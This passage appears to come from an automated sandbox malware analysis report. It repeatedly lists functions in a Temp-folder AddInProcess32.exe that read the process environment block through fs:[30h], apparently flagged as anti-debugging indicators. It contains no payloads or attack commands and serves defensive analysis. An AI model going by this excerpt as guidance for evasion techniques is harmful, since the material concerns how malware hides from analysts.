          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01388B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01385BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013623E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E53C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01388A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01344257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01388D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01333540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01363D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01368DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138740D mov eax, dword ptr fs:[00000030h]
